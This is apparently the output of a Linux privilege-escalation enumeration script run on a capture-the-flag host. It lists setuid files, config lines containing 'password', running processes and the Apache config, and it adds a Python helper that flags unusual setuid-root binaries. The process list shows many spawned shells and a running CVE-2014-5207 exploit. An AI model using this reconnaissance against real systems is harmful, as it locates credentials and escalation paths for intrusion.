drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/fonts
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/sbin
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/bin
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/games
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/src
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/chatscripts
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/ppp/peers
drwxr-sr-x 29 man root 4096 Mar 24 06:50 /var/cache/man
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ro
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/sk
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/hr
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/zh
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/nl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/el
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/da
drwxrwsr-x 2 root mail 4096 May 11 2018 /var/mail
drwxr-s--- 2 Debian-exim adm 4096 Mar 24 06:45 /var/log/exim4
drwxrwsr-x 2 root staff 4096 Jan 9 2017 /var/local
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwxr-sr-x 1 root shadow 34424 May 27 2017 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
drwxr-sr-x 3 root systemd-journal 60 Mar 24 06:40 /run/log/journal
drwxr-s--- 2 root systemd-journal 60 Mar 24 06:40 /run/log/journal/58827ab6b7d24c318344087f9268b9b5
-rwsr-xr-x 1 root root 1105840 Dec 31 1969 /home/ircd/test/sh
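Added triage helper (mine, not part of privesc.py): the listing above is long and most of it is stock Debian. The script parses `ls -l` lines, keeps only setuid-root regular files, and flags the ones outside package-managed directories, with an epoch-zero mtime, or modified after the install date. The install date is an assumption taken from the `/usr/local` and `/etc/cron.*` directory mtimes above (May 11 2018). A flag means "look here first", not that the file is exploitable.

```python
import re
from datetime import date

# Constructed sample: a subset of the SUID/SGID listing from the privesc.py run above.
SAMPLE = """\
-rwxr-sr-x 1 root mail 13680 Dec 24 2016 /usr/lib/evolution/camel-lock-helper-1.2
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/bin
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 1105840 Dec 31 1969 /home/ircd/test/sh
"""

# Where dpkg-managed setuid binaries normally live on Debian.
SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), start=1)}

LINE_RE = re.compile(
    r"^(?P<perms>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<yt>\d{4}|\d{2}:\d{2})\s+(?P<path>/\S+)$"
)


def parse_listing(text):
    """ls -l lines -> dicts; mtime is None when ls printed HH:MM (under a year old)."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        perms, yt = m["perms"], m["yt"]
        year = None if ":" in yt else int(yt)
        entries.append({
            "path": m["path"],
            "owner": m["owner"],
            "is_file": perms[0] == "-",
            "setuid": perms[3] in "sS",   # owner execute slot carries the setuid bit
            "mtime": date(year, MONTHS[m["mon"]], int(m["day"])) if year else None,
        })
    return entries


def triage_suid(text, install_date):
    """{path: [reasons]} for setuid-root regular files worth a manual look."""
    findings = {}
    for e in parse_listing(text):
        if not (e["is_file"] and e["setuid"] and e["owner"] == "root"):
            continue
        reasons = []
        if not e["path"].startswith(SYSTEM_PREFIXES):
            reasons.append("outside package-managed directories")
        if e["mtime"] is None:
            reasons.append("modified within the last year")
        elif e["mtime"] <= date(1970, 1, 1):
            reasons.append("epoch-zero timestamp")
        elif e["mtime"] > install_date:
            reasons.append("modified after the install date")
        if reasons:
            findings[e["path"]] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in sorted(triage_suid(SAMPLE, date(2018, 5, 11)).items()):
        print(path, "->", "; ".join(reasons))
```

On a live box, feed it `find / -perm -4000 -type f -exec ls -l {} + 2>/dev/null` and then confirm ownership with `dpkg -S <path>`: a setuid root binary that no package claims is the one to read, or to `strings`, before anything else.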
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/bogofilter.cf:# the password database, or the user id
/etc/exim4/exim4.conf.template:# Authenticators which rely on unencrypted clear text passwords don't
/etc/exim4/exim4.conf.template:# advertise unencrypted clear text password based authenticators on all
/etc/exim4/exim4.conf.template:# preferred over allowing clear text password based authenticators on
/etc/exim4/exim4.conf.template:# use), an authentication ID, and a password. The latter two appear as
/etc/exim4/exim4.conf.template:# valid username and password. In a real configuration you would typically
/etc/exim4/exim4.conf.template:# password are $auth1 and $auth2. Apart from that you can use the same
/etc/exim4/exim4.conf.template:# Authenticate against local passwords using sasl2-bin
/etc/exim4/exim4.conf.template:# # don't send system passwords over unencrypted connections
/etc/exim4/exim4.conf.template:# They get the passwords from CONFDIR/passwd.client, whose format is
/etc/exim4/exim4.conf.template:# Because AUTH PLAIN and AUTH LOGIN send the password in clear, we
/etc/exim4/exim4.conf.template:# clear text password authentication on all connections.
/etc/firebird/2.5/firebird.conf:# If you want to disable logons with old passwords
/etc/firebird/2.5/firebird.conf:# this connection one even need not know login/password on external server.
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/cracklib/cracklib.conf:# passwords should not match. The files may optionally be compressed
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/security/pwquality.conf:# Configuration for systemwide password quality limits
/etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the
/etc/security/pwquality.conf:# old password.
/etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if
/etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0
/etc/security/pwquality.conf:# it is the minimum number of digits in the new password.
/etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# The maximum credit for having other characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others).
/etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password.
/etc/security/pwquality.conf:# new password.
/etc/reportbug.conf:# Username and password for SMTP
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
zlib1g:i386 1:1.2.8.dfsg-2+b1 compression library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 06:40 0:02 /sbin/init
root 2 06:40 0:00 [kthreadd]
root 3 06:40 0:11 [ksoftirqd/0]
root 5 06:40 0:00 [kworker/0:0H]
root 7 06:40 0:11 [rcu_sched]
root 8 06:40 0:00 [rcu_bh]
root 9 06:40 0:00 [migration/0]
root 10 06:40 0:00 [watchdog/0]
root 11 06:40 0:00 [khelper]
root 12 06:40 0:00 [kdevtmpfs]
root 13 06:40 0:00 [netns]
root 14 06:40 0:00 [khungtaskd]
root 15 06:40 0:00 [writeback]
root 16 06:40 0:00 [ksmd]
root 17 06:40 0:00 [khugepaged]
root 18 06:40 0:00 [crypto]
root 19 06:40 0:00 [kintegrityd]
root 20 06:40 0:00 [bioset]
root 21 06:40 0:00 [kblockd]
root 23 06:40 0:00 [kswapd0]
root 24 06:40 0:00 [vmstat]
root 25 06:40 0:00 [fsnotify_mark]
root 31 06:40 0:00 [kthrotld]
root 32 06:40 0:00 [ipv6_addrconf]
root 33 06:40 0:00 [deferwq]
root 34 06:40 0:00 [kworker/u2:1]
root 68 06:40 0:00 [ata_sff]
root 69 06:40 0:00 [mpt_poll_0]
root 70 06:40 0:00 [khubd]
root 71 06:40 0:00 [mpt/0]
root 72 06:40 0:00 [kpsmoused]
root 75 06:40 0:00 [scsi_eh_0]
root 76 06:40 0:00 [scsi_tmf_0]
root 77 06:40 0:00 [scsi_eh_1]
root 78 06:40 0:00 [kworker/u2:2]
root 80 06:40 0:00 [scsi_tmf_1]
root 81 06:40 0:00 [scsi_eh_2]
root 82 06:40 0:00 [scsi_tmf_2]
root 85 06:40 0:00 [kworker/0:1H]
root 107 06:40 0:00 [jbd2/sda1-8]
root 108 06:40 0:00 [ext4-rsv-conver]
root 139 06:40 0:00 [kauditd]
root 151 06:40 0:00 /lib/systemd/systemd-udevd
root 152 06:40 0:00 /lib/systemd/systemd-journald
root 194 06:40 0:00 [ttm_swap]
root 461 06:40 0:00 /sbin/rpcbind
statd 470 06:40 0:00 /sbin/rpc.statd
root 476 06:40 0:00 [rpciod]
root 478 06:40 0:00 [nfsiod]
root 485 06:40 0:00 /usr/sbin/rpc.idmapd
root 487 06:40 0:00 /usr/lib/accountsservice/accounts-daemon
root 489 06:40 0:00 /usr/sbin/NetworkManager
root 490 06:40 0:07 /usr/bin/vmtoolsd
root 491 06:40 0:00 /usr/sbin/rsyslogd
root 493 06:40 0:00 /usr/sbin/ModemManager
avahi 494 06:40 0:00 avahi-daemon:
daemon 495 06:40 0:00 /usr/sbin/atd
root 498 06:40 0:00 /usr/sbin/cron
avahi 502 06:40 0:00 avahi-daemon:
message+ 503 06:40 0:00 /usr/bin/dbus-daemon
root 514 06:40 0:00 /lib/systemd/systemd-logind
root 539 06:40 0:00 /usr/sbin/cups-browsed
root 543 06:40 0:00 /usr/sbin/acpid
root 545 06:40 0:00 /usr/sbin/minissdpd
root 549 06:40 0:00 /usr/sbin/sshd
root 553 06:40 0:00 [cfg80211]
root 561 06:40 0:00 /usr/lib/policykit-1/polkitd
ircd 599 06:40 0:00 /lib/systemd/systemd
root 603 06:40 0:00 /usr/sbin/gdm3
ircd 613 06:40 0:00 (sd-pam)
root 631 06:40 0:00 /usr/bin/Xorg
root 650 06:40 0:00 sshd:
ircd 654 06:40 0:01 /home/ircd/Unreal3.2/src/ircd
root 863 06:40 0:00 /usr/sbin/apache2
Debian-+ 925 06:40 0:00 /usr/sbin/exim4
root 933 06:40 0:00 gdm-session-worker
Debian-+ 936 06:40 0:00 /lib/systemd/systemd
Debian-+ 937 06:40 0:00 (sd-pam)
Debian-+ 939 06:40 0:00 /usr/bin/gnome-session
Debian-+ 942 06:40 0:00 /usr/bin/dbus-launch
Debian-+ 943 06:40 0:00 /usr/bin/dbus-daemon
Debian-+ 946 06:40 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
Debian-+ 950 06:40 0:00 /usr/bin/dbus-daemon
Debian-+ 953 06:40 0:00 /usr/lib/at-spi2-core/at-spi2-registryd
Debian-+ 961 06:40 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
root 966 06:40 0:00 /sbin/agetty
root 971 06:40 0:00 /usr/lib/upower/upowerd
Debian-+ 984 06:40 0:06 gnome-shell
colord 985 06:40 0:00 /usr/lib/colord/colord
Debian-+ 999 06:40 0:00 /usr/bin/pulseaudio
rtkit 1000 06:40 0:00 /usr/lib/rtkit/rtkit-daemon
Debian-+ 1018 06:40 0:00 /usr/lib/dconf/dconf-service
root 1027 06:40 0:00 /sbin/wpa_supplicant
root 1030 06:40 0:00 /usr/lib/packagekit/packagekitd
ircd 1044 06:41 0:00 perl
djmardov 1045 06:41 0:00 /lib/systemd/systemd
djmardov 1046 06:41 0:00 (sd-pam)
djmardov 1048 06:41 0:01 sshd:
djmardov 1049 06:41 0:00 -bash
ircd 1071 06:41 0:00 sh
ircd 1072 06:41 0:00 python
ircd 1073 06:41 0:00 /bin/bash
www-data 1302 06:45 0:00 /usr/sbin/apache2
root 1307 06:45 0:00 /usr/sbin/cupsd
www-data 1376 06:45 2:03 /usr/sbin/apache2
www-data 1377 06:45 2:02 /usr/sbin/apache2
root 1448 06:46 0:00 sshd:
djmardov 1454 06:46 0:00 sshd:
djmardov 1455 06:46 0:00 /usr/lib/openssh/sftp-server
root 2828 06:58 0:00 sshd:
djmardov 2830 06:58 0:00 sshd:
djmardov 2831 06:58 0:00 -bash
ircd 2859 06:59 0:00 sh
ircd 2860 06:59 0:00 telnet
ircd 2861 06:59 0:00 sh
ircd 2949 07:07 0:00 python3
ircd 2950 07:07 0:00 /bin/bash
ircd 4471 07:26 0:00 sh
ircd 4472 07:26 0:00 telnet
ircd 4473 07:26 0:00 sh
ircd 4482 07:27 0:00 python
ircd 4483 07:27 0:00 /bin/bash
ircd 6117 07:33 0:00 sh
ircd 6119 07:33 0:00 sh
ircd 6123 07:33 0:00 /usr/bin/python
ircd 6124 07:33 0:00 /bin/sh
ircd 6181 07:38 0:00 python
ircd 6200 07:39 0:00 sh
ircd 6201 07:39 0:00 /bin/bash
ircd 6273 07:43 0:00 python
ircd 6282 07:44 0:00 sh
ircd 6283 07:44 0:00 /bin/bash
ircd 6312 07:44 0:00 sh
ircd 6314 07:44 0:00 sh
ircd 6317 07:45 0:00 /usr/bin/python
ircd 6318 07:45 0:00 /bin/sh
ircd 6356 07:47 0:00 sh
ircd 6357 07:47 0:00 telnet
ircd 6358 07:47 0:00 sh
ircd 6391 07:50 0:00 sh
ircd 6392 07:50 0:00 telnet
ircd 6396 07:50 0:00 sh
ircd 6409 07:51 0:00 python3
ircd 6410 07:51 0:00 /bin/bash
ircd 7076 07:58 0:00 python
ircd 7082 07:58 0:00 sh
ircd 7083 07:58 0:00 /bin/bash
ircd 7118 08:00 0:02 python
ircd 7168 08:03 0:00 python
ircd 7169 08:03 0:00 sh
ircd 7170 08:03 0:00 /bin/sh
ircd 7182 08:06 0:00 sh
ircd 7183 08:06 0:00 telnet
ircd 7189 08:08 0:00 sh
ircd 7194 08:09 0:00 bash
ircd 7195 08:09 0:00 bash
ircd 7214 08:11 0:00 sleep
ircd 7215 08:11 0:00 telnet
ircd 7216 08:11 0:00 sh
ircd 7217 08:11 0:00 telnet
ircd 7218 08:11 0:00 sh
ircd 7226 08:12 0:00 bash
ircd 7230 08:12 0:00 sleep
ircd 7301 08:16 0:00 /bin/bash
ircd 7417 08:18 0:00 sleep
ircd 7455 08:21 0:00 python
ircd 7456 08:21 0:00 /bin/bash
ircd 7457 08:22 0:00 script
ircd 7458 08:22 0:00 script
ircd 7459 08:22 0:00 sh
ircd 7481 08:26 0:00 perl
ircd 7487 08:26 0:00 sleep
ircd 7528 08:32 0:00 sleep
ircd 7536 08:33 0:00 sleep
ircd 7537 08:33 0:00 telnet
ircd 7538 08:33 0:00 sh
ircd 7539 08:33 0:00 telnet
ircd 7540 08:33 0:00 sh
ircd 7546 08:33 0:00 /tmp/MtGtX
ircd 7578 08:37 0:00 sleep
ircd 7667 08:41 0:00 perl
ircd 7671 08:41 0:00 sleep
ircd 7672 08:41 0:00 telnet
ircd 7673 08:41 0:00 sh
ircd 7674 08:41 0:00 telnet
ircd 7675 08:41 0:00 sh
ircd 7682 08:41 0:00 sh
ircd 7683 08:41 0:00 /usr/bin/python
ircd 7684 08:41 0:00 /bin/sh
ircd 8000 08:44 0:00 python
ircd 8001 08:44 0:00 /bin/bash
ircd 8003 08:45 0:00 python
ircd 8004 08:45 0:00 /bin/bash
ircd 8005 08:45 0:00 python
ircd 8006 08:45 0:00 /bin/bash
ircd 8007 08:45 0:00 python
ircd 8008 08:45 0:00 /bin/bash
ircd 8011 08:45 0:00 python
ircd 8012 08:45 0:00 sh
ircd 8013 08:45 0:00 /bin/bash
ircd 8024 08:46 0:00 sleep
ircd 8025 08:46 0:00 telnet
ircd 8026 08:46 0:00 sh
ircd 8027 08:46 0:00 telnet
ircd 8028 08:46 0:00 sh
root 8030 08:46 0:00 sshd:
djmardov 8032 08:47 0:00 sshd:
djmardov 8035 08:47 0:00 -bash
root 8039 08:47 0:00 sshd:
djmardov 8041 08:48 0:00 sshd:
djmardov 8042 08:48 0:00 -bash
ircd 8070 08:49 0:00 /bin/sh
ircd 8078 08:49 0:00 python
ircd 8097 08:50 0:00 perl
ircd 8104 08:50 0:00 sh
ircd 8105 08:50 0:00 /usr/bin/python
ircd 8106 08:50 0:00 /bin/sh
ircd 8110 08:50 0:00 python
ircd 8356 08:50 0:00 sh
ircd 8357 08:50 0:00 /bin/sh
root 8766 08:52 0:00 sshd:
djmardov 9548 08:53 0:00 sshd:
djmardov 9549 08:53 0:00 -bash
ircd 11104 08:54 0:00 /bin/sh
root 11123 08:55 0:00 viewuser
root 11126 08:55 0:00 sh
root 11127 08:55 0:00 /bin/sh
root 11128 08:55 0:00 /bin/sh
ircd 11919 09:00 0:00 sleep
ircd 11920 09:00 0:00 telnet
ircd 11921 09:00 0:00 sh
ircd 11922 09:00 0:00 telnet
ircd 11923 09:00 0:00 sh
ircd 11929 09:00 0:00 python3
ircd 11930 09:00 0:00 /bin/sh
ircd 11944 09:01 0:00 sh
ircd 11947 09:01 0:00 /bin/bash
ircd 12694 09:02 0:00 /bin/bash
ircd 12699 09:02 0:00 python3
ircd 12700 09:02 0:00 /bin/bash
ircd 12752 09:05 0:00 sleep
ircd 12753 09:05 0:00 telnet
ircd 12754 09:05 0:00 sh
ircd 12755 09:05 0:00 telnet
ircd 12756 09:05 0:00 sh
root 12761 09:06 0:00 [kworker/0:2]
ircd 12764 09:06 0:00 perl
ircd 12773 09:06 0:00 sleep
ircd 12774 09:06 0:00 telnet
ircd 12775 09:06 0:00 sh
ircd 12776 09:06 0:00 telnet
ircd 12785 09:06 0:00 sleep
ircd 12802 09:07 0:00 sleep
ircd 12803 09:07 0:00 telnet
ircd 12804 09:07 0:00 sh
ircd 12805 09:07 0:00 telnet
ircd 12806 09:07 0:00 sh
ircd 13231 09:09 0:00 sleep
ircd 13242 09:10 0:00 sh
ircd 13248 09:10 0:00 sleep
ircd 13249 09:10 0:00 telnet
ircd 13250 09:10 0:00 sh
ircd 13251 09:10 0:00 telnet
ircd 13252 09:10 0:00 sh
root 13259 09:11 0:00 [kworker/0:0]
ircd 13262 09:11 0:00 /usr/bin/python
ircd 13263 09:11 0:00 /bin/sh
ircd 13284 09:13 0:00 sleep
ircd 13285 09:13 0:00 telnet
ircd 13286 09:13 0:00 sh
ircd 13287 09:13 0:00 telnet
ircd 13288 09:13 0:00 sh
ircd 13549 09:13 0:00 vi
root 14317 09:16 0:00 sshd:
sshd 14318 09:16 0:00 sshd:
root 14320 09:16 0:00 [kworker/0:1]
ircd 14334 09:16 0:00 ./CVE-2014-5207_fuse_suid_3.16.1.1
ircd 14337 09:16 0:00 [CVE-2014-5207_f]
ircd 14344 09:16 0:00 python
ircd 14578 09:16 0:00 /bin/sh
ircd 14579 09:16 0:00 ps
ircd 14580 09:16 0:00 awk
[+] Apache Version and Modules
[+] Apache Config File
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.
# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
#	/etc/apache2/
#	|-- apache2.conf
#	|	`--  ports.conf
#	|-- mods-enabled
#	|	|-- *.load
#	|	`-- *.conf
#	|-- conf-enabled
#	|	`-- *.conf
#	`-- sites-enabled
#		`-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
# together by including all remaining configuration files when starting up the
# web server.
#
# * ports.conf is always included from the main configuration file. It is
# supposed to determine listening ports for incoming connections which can be
# customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
# directories contain particular configuration snippets which manage modules,
# global configuration fragments, or virtual host configurations,
# respectively.
#
# They are activated by symlinking available configuration files from their
# respective *-available/ counterparts. These should be managed by using our
# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
# their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
# the default configuration, apache2 needs to be started/stopped with
# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
# work with the default configuration.
# Global configuration
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>
<Directory /usr/share>
	AllowOverride None
	Require all granted
</Directory>
<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride None
	Require all granted
</Directory>
#<Directory /srv/>
#	Options Indexes FollowSymLinks
#	AllowOverride None
#	Require all granted
#</Directory>
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<FilesMatch "^\.ht">
	Require all denied
</FilesMatch>
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 8030 08:46 0:00 sshd:
root 461 06:40 0:00 /sbin/rpcbind
Possible Related Packages:
rpcbind 0.2.1-6+deb8u2 converts RPC program numbers into universal addresses
root 108 06:40 0:00 [ext4-rsv-conver]
root 70 06:40 0:00 [khubd]
root 151 06:40 0:00 /lib/systemd/systemd-udevd
root 1030 06:40 0:00 /usr/lib/packagekit/packagekitd
root 25 06:40 0:00 [fsnotify_mark]
root 491 06:40 0:00 /usr/sbin/rsyslogd
root 21 06:40 0:00 [kblockd]
root 11127 08:55 0:00 /bin/sh
root 71 06:40 0:00 [mpt/0]
root 545 06:40 0:00 /usr/sbin/minissdpd
Possible Related Packages:
minissdpd 1.2.20130907-3+deb8u1 keep memory of all UPnP devices that announced themselves
root 9 06:40 0:00 [migration/0]
root 24 06:40 0:00 [vmstat]
root 1448 06:46 0:00 sshd:
root 971 06:40 0:00 /usr/lib/upower/upowerd
root 650 06:40 0:00 sshd:
root 14 06:40 0:00 [khungtaskd]
root 631 06:40 0:00 /usr/bin/Xorg
Possible Related Packages:
xserver-xorg-core 2:1.16.4-1+deb8u2 Xorg X server - core server
root 32 06:40 0:00 [ipv6_addrconf]
root 8766 08:52 0:00 sshd:
root 485 06:40 0:00 /usr/sbin/rpc.idmapd
root 78 06:40 0:00 [kworker/u2:2]
root 13 06:40 0:00 [netns]
root 11 06:40 0:00 [khelper]
root 490 06:40 0:07 /usr/bin/vmtoolsd
root 1027 06:40 0:00 /sbin/wpa_supplicant
